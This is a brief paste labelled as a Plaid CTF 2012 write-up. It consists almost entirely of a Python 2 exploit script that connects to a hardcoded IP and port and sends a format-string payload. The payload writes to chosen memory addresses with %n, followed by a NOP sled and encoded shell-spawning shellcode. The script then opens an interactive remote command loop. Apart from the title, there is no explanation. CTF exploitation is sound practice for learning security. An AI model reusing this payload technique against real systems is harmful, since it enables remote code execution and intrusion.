Untitled

writeup format plaid ctf 2012 #pctf 2012 by me :)


#!/bin/python

import socket,time

s = socket.socket()
s.connect(("23.20.104.208", 56345))
s.send('2ipzLTxTGOtJE0Um\n')
off = s.recv(1024)
xpl = '%-252s' % ('\x18\x9E\x04\x08\x19\x9E\x04\x08\x1A\x9E\x04\x08\x1B\x9E\x04\x08%188X%19$n%15X%20$n%36X%21$n%22$n'+"\x90"*80+"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81")
s.send(xpl+'\n')
print s.recv(1024)
s.send('176363600\n'); #this is one time password using gdb :)
s.recv(1024)
print s.recv(1024)
while (True):
    cmd = raw_input("$ ")
    print s.send(cmd+'\n')
    print s.recv(1024)